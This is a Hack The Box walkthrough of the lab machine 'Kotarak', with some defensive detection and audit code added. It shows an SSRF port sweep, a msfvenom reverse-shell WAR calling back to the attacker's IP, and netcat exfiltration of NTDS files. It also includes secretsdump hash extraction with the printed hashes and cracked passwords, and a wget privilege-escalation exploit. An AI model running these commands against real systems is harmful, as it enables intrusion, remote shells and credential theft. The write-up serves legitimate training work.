HTB Write-up Kotarak

nmap:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
1112/tcp filtered msql
6002/tcp filtered X11:2
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
10009/tcp filtered swdtp-sv
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
8009 enum:
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-request:
| AJP/1.3 404 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 992
|
|_<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 404 - /</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.5</h3></body></html>
| ajp-headers:
| Content-Type: text/html;charset=utf-8
| Content-Language: en
|_ Content-Length: 992
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080 enum:
Apache Tomcat/8.5.5
dirsearch result:
/examples/
index.jsp
manager
index.jsp took me to the tomcat page:
Attempted logging in to host-manager but I got this
s3cret?
tomcat -s3cret didn't work..lol
After running the full scan, I found port 60000 open
possibly LFI vuln?
It looks like you can enter any URL to browse, so I entered my own and served an HTTP server.
it worked.
If we see a user agent here we could exploit it, but not this time.
Let's enter some values like file://etc/passwd
ok..
Now we can fuzz the local ports with wfuzz
wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
Got a bunch of 2L (two-line) responses, so let's modify our command:
wfuzz -z range,1-65535 --hl=2 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
  • --hl=2 hides the responses that are 2 lines long
We can see some stuff coming back.
On port 888, found a file server.
After URL encoding the last part of the request with burp, I was able to see the content
username: admin
password: [email protected]!
Now we are finally in the admin portal.
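From the defending side, the localhost:FUZZ sweep through url.php above is easy to spot in the web server's access log. The following is an added example, not part of the original notes: it assumes a combined-format access log, and the sample lines, client addresses and port threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format, documentation IP ranges).
LOG = '{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /url.php?path={url} HTTP/1.1" 200 2'
SAMPLE_LOG = "\n".join(
    [LOG.format(ip="203.0.113.7", url=f"http://localhost:{p}") for p in range(880, 890)]
    + [LOG.format(ip="198.51.100.9", url=u) for u in
       ("http://example.com/", "file:///etc/passwd", "http://127.0.0.1:8080/")])

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} ')

def is_internal(host):
    """True for localhost names and loopback/private/link-local IP literals."""
    if not host:
        return False
    if host.lower() == "localhost" or host.lower().endswith(".localhost"):
        return True
    try:
        ip = ip_address(host)
    except ValueError:
        return False  # ordinary DNS name; resolving it is out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local

def find_ssrf_probes(log_text, port_threshold=5):
    """Per client: internal ports requested via ?path=, non-HTTP schemes, sweep flag."""
    seen = defaultdict(lambda: {"internal_ports": set(), "schemes": set()})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        request = urlsplit(target)
        if not request.path.endswith("/url.php"):
            continue
        for value in parse_qs(request.query).get("path", []):  # parse_qs URL-decodes
            try:
                inner = urlsplit(value)
                port = inner.port
            except ValueError:  # malformed host or out-of-range port
                continue
            if inner.scheme not in ("http", "https"):
                seen[client]["schemes"].add(inner.scheme or "(none)")
            elif is_internal(inner.hostname):
                default = 443 if inner.scheme == "https" else 80
                seen[client]["internal_ports"].add(port or default)
    return {c: {**v, "sweep": len(v["internal_ports"]) >= port_threshold}
            for c, v in seen.items()}
```

The same `is_internal` check, applied to the resolved address before the fetch, is what the proxy page itself would need in order to refuse these requests.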
Make a WAR shell with msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war
Got an initial shell back after deploying the WAR file and starting a nc listener.
Spawn the shell: python -c 'import pty;pty.spawn("/bin/bash")'
backups looks interesting
find . --> useful to find hidden files.
Started a listener on Kali: nc -nvlp 443 > SYSTEM
nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
Did the same for the other file.
Now we've got the two files on our machine.

What is the NTDS.dit File?

The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.

Extracting Hashes and Domain Info From .dit

If you have the NTDS.dit file and the SYSTEM hive, you can simply use the secretsdump.py from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I’m going to create a simple python HTTP server to transfer the files from the remote victim machine to my local machine.
It took forever to download these files! I tried the nc method but I couldn't see the progress, so the files kept getting corrupted.
python secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL
Output
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Time to crack some hashes!
Since the box is not Windows, we have to crack them. And we don't care about the ones with $.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
separate them before the fourth colon.
Used this site to crack them.
admin cracked:
f16tomcat!
atanas - Password123!
Let's try ssh into these.
couldn't get in...
tried using su - atanas with the other password and it worked.
it looks like ssh is not enabled for this account.
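The secretsdump output above is one account per line in the layout user:rid:LM hash:NT hash:::, and a dump like this can be audited for weak settings without cracking anything. The following is an added example, not part of the original notes; the account names and hash values in the sample are constructed placeholders, apart from the two well-known empty-password constants.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample in the same layout; names and hash values are placeholders.
SAMPLE = f"""\
Administrator:500:{EMPTY_LM}:{'1' * 32}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
DC01$:1000:{EMPTY_LM}:{'2' * 32}:::
LAB\\svc_backup:1104:{'3' * 32}:{'4' * 32}:::
alice:1108:{EMPTY_LM}:{'4' * 32}:::
[*] Cleaning up...
"""

ENTRY = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$")

def parse(text):
    """Yield one dict per user:rid:lm:nt::: line, ignoring tool status lines."""
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            e = m.groupdict()
            e["user"] = e["user"].split("\\")[-1]  # drop an optional DOMAIN\ prefix
            e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
            yield e

def audit(text):
    """Summarise weaknesses visible in the dump itself."""
    users = [e for e in parse(text) if not e["user"].endswith("$")]  # skip machine accounts
    by_nt = defaultdict(list)
    for e in users:
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    return {
        "blank_password": [e["user"] for e in users if e["nt"] == EMPTY_NT],
        "lm_hash_stored": [e["user"] for e in users if e["lm"] != EMPTY_LM],
        "shared_password": sorted(sorted(g) for g in by_nt.values() if len(g) > 1),
        "builtin_admin": [e["user"] for e in users if e["rid"] == "500"],
    }
```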

Priv Esc

In the root folder, we can actually read app.log and flag.txt
wget 1.16...
let's do searchsploit to see what we have.
  1. Pasted the wget.rc content in /dev/shm folder
You cannot run a Python server on port 21, but the box has a program called authbind installed, and it bypasses that.
uploading wget exploit file to the victim (modified some parts)
used wget -r http://IP/exploit.py to transfer the file.
changed the http listening port to 0.0.0.0
In summary: we need to have a Python server and the FTP server on the victim's machine,
and nc running on the attacker's.
/root/hacked-via-wget